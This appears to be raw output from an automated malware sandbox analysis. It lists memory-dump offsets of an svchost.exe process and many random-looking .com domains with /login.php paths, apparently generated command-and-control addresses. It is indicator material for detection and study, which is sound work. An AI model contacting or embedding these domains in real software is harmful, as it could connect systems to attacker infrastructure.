    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygul.com/login.php
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjav.com/http://qebytiq.com/http://vopybyt.com/http://gatyvyz.com/http://lyvytuj.com/http:
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700765677.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674300395.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1434622104.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681528287.00000000029FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjav.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyteq.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2017552428.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592820516.00000000060F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592702110.00000000060F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594414511.00000000029E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598836599.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujywiv.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybal.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumycav.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586377868.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585383980.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586144218.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumycug.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583844692.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579912316.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579923926.000000000615C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577836262.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576857106.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583773094.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577080593.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576872039.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573220991.000000000600B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumydoq.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051811464.00000000029FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumydyg.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjig.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1685225078.000000000297E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjip.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymuv.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumypog.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytyq.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526539327.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywaq.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669888857.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywov.com/login.php
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupybul.com/H
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupybul.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycag.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydeq.com/login.php
    Source: svchost.exe, 00000002.00000002.2675178406.000000000B454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydev.com/login.php
    Source: svchost.exe, 00000002.00000003.1634278888.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1997163997.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606063186.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616632601.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630888334.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631259260.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630898468.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2008438973.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602654258.00000000029FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydig.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupygel.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063763771.000000000297C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064442464.000000000297E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643724869.00000000029AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyguq.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjuv.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupypil.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514159818.000000000600E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511813828.0000000006007000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2660956240.0000000006010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514012420.000000000600C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyteg.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupytyl.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxuq.com/login.php
    Source: svchost.exe, 00000002.00000003.1807684932.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686150606.0000000002955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1701312723.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1798156248.0000000002959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663699181.00000000060FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1728166475.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720674945.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purycap.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1979341685.0000000003AEB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975298879.0000000003AEB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1979387621.0000000003AEB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1990902975.0000000003AEB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1993674886.0000000003AEB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591194658.0000000006008000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purydip.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579923926.000000000615C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575937729.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576857106.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576872039.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purygeg.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylev.com/
